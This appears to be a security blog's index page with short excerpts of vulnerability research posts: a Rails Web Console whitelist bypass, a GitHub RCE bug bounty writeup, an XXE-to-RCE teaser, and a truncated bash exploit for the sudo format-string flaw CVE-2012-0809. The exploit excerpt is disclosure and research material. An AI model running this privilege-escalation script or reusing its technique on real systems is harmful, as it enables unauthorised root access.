WebConsole IP Whitelist bypass

With the release of Ruby on Rails 4.2 the so called Web Console was introduced. As the Web Console documentation states: Web Console is built explicitly for Rails 4. By default the Web Console is available in the Rails Development Environment and allows only the IPs 127.0.0.1 and ::1 to access the console in order to evaluate arbitrary Ruby statements for the purpose of debugging. However with Rails Versions 4.1 and 4.
Read more →

CVE-2012-0809 Exploit

Original gist #!/bin/bash # CVE-2012-0809 exploit # joernchen of Phenoelit's version # Payload to be executed goes to /tmp/a (might be a shell script) cd /tmp /bin/echo '-> Clearing ENV' for i in env |cut -f1 -d "=" ;do unset $i;done /bin/echo '-> Creating symlink' /bin/ln -s /usr/bin/sudo ./%134520134x%900$n /bin/echo '-> Setting ENV' export AAA=AAAA; export A; for i in /usr/bin/seq 1 5000; do export A=$Aecho -n -e '\x24\x83\x05\x08'; done; /bin/echo '-> Now a little Brute-Force' while true ; do SUDO_ASKPASS=/tmp/a .
Read more →

GitHub RCE Writeup

Original gist GitHub RCE by Environment variable injection Bug Bounty writeup Disclaimer: I’ll keep this really short but I hope you’ll get the key points. GitHub blogged a while ago about some internal tool called gerve: https://github.com/blog/530-how-we-made-github-fast Upon git+sshing to github.com gerve basically looks up your permission on the repo you want to interact with. Then it bounces you further in another forced SSH session to the back end where the repo actually is.
Read more →

XXE to RCE

Read more →